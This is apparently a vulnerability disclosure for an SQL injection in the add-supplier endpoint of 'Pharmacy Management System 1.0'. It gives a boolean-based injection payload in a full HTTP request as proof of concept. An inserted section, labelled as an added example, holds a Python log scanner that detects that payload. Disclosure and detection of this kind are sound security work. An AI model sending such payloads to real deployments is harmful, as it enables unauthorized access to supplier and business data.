
@higordiego
Created October 16, 2024 21:36

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • /php/add_new_supplier.php?name=aaaa&email=aa@contato.com.br&contact_number=1234567890&address=321321321321adsadsadsa%20%20dsadsadsa

Vulnerability Description:

A critical SQL injection vulnerability has been discovered in the Pharmacy Management System version 1.0, specifically in the add-supplier functionality. The flaw exists because user input, such as the name parameter, is used in the database query without proper sanitization. An attacker can manipulate this input to inject and execute arbitrary SQL commands through a GET request to the endpoint /php/add_new_supplier.php.

If exploited, this vulnerability may allow unauthorized access to sensitive data, including supplier details, and disrupt operations. Given the absence of a patch, the issue represents a severe risk, demanding immediate remediation to prevent database compromise and information leakage.


Proof of Concept (PoC):

Below is an example of a GET request illustrating how the SQL injection vulnerability can be exploited by manipulating the name parameter:

GET /php/add_new_supplier.php?name=aaaa'%20AND%201087%3d1087%20AND%20'DBIs'%3d'DBIs%26email%3daa%40contato.com.br%26contact_number%3d1234567890%26address%3d321321321321adsadsadsa%20%20dsadsadsa HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/add_purchase.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
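Added example, not part of the original report: a small Python scanner over constructed access-log lines that flags the two traits of the PoC request above, a boolean tautology (1087=1087) inside a parameter value, and the %26-encoded separators that leave the endpoint's other expected parameters missing from the request. The log format and the expected-parameter set (taken from the endpoint listed above) are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines (not from the report); line 2 mirrors the PoC payload.
SAMPLE_LOG = """\
127.0.0.1 - - [16/Oct/2024:21:36:01 +0000] "GET /php/add_new_supplier.php?name=aaaa&email=aa%40contato.com.br&contact_number=1234567890&address=Rua%201 HTTP/1.1" 200 512
127.0.0.1 - - [16/Oct/2024:21:36:07 +0000] "GET /php/add_new_supplier.php?name=aaaa'%20AND%201087%3d1087%20AND%20'DBIs'%3d'DBIs%26email%3daa%40contato.com.br%26contact_number%3d1234567890%26address%3dx HTTP/1.1" 200 512
127.0.0.1 - - [16/Oct/2024:21:36:09 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

# Parameters each endpoint should receive (assumed from the vulnerable endpoint in the report).
EXPECTED_PARAMS = {
    "/php/add_new_supplier.php": {"name", "email", "contact_number", "address"},
}

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Boolean tautology as in the PoC: a quote closing the string literal, AND/OR,
# then an equality whose two sides are the same literal (1087=1087, 'a'='a').
TAUTOLOGY_RE = re.compile(
    r"""['"]\s*(?:and|or)\s+(['"]?)(\w+)\1\s*=\s*\1\2\1""", re.IGNORECASE)

def suspicious_params(query: str) -> dict[str, str]:
    """Map parameter name -> decoded value for each value matching TAUTOLOGY_RE."""
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:  # parse_qs already percent-decodes each value
            if TAUTOLOGY_RE.search(value):
                hits[name] = value
    return hits

def missing_params(path: str, query: str) -> set[str]:
    """Expected parameters absent from the request: in the PoC the encoded %26
    keeps email/contact_number/address inside the name value, so they vanish."""
    return EXPECTED_PARAMS.get(path, set()) - set(parse_qs(query, keep_blank_values=True))

def scan_log(text: str) -> list[dict]:
    """One finding per log line showing a tautology or missing expected params."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        hits, missing = suspicious_params(query), missing_params(path, query)
        if hits or missing:
            findings.append({"line": lineno, "path": path,
                             "tautology": hits, "missing": sorted(missing)})
    return findings
```

The missing-parameter check is the cheaper signal in practice: a legitimate form submission to this endpoint always carries all four fields, so a request that arrives with only name warrants a look even when the payload pattern changes.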

Burp Suite Requests:

  • Burp Suite PoC

SQLMap Exploit:

  • SQLMap PoC

External Links:


This report demonstrates the potential exploitation of an SQL injection vulnerability in the add supplier functionality within the Pharmacy Management System. It provides detailed PoCs and practical examples to highlight the risks associated with improper input sanitization.
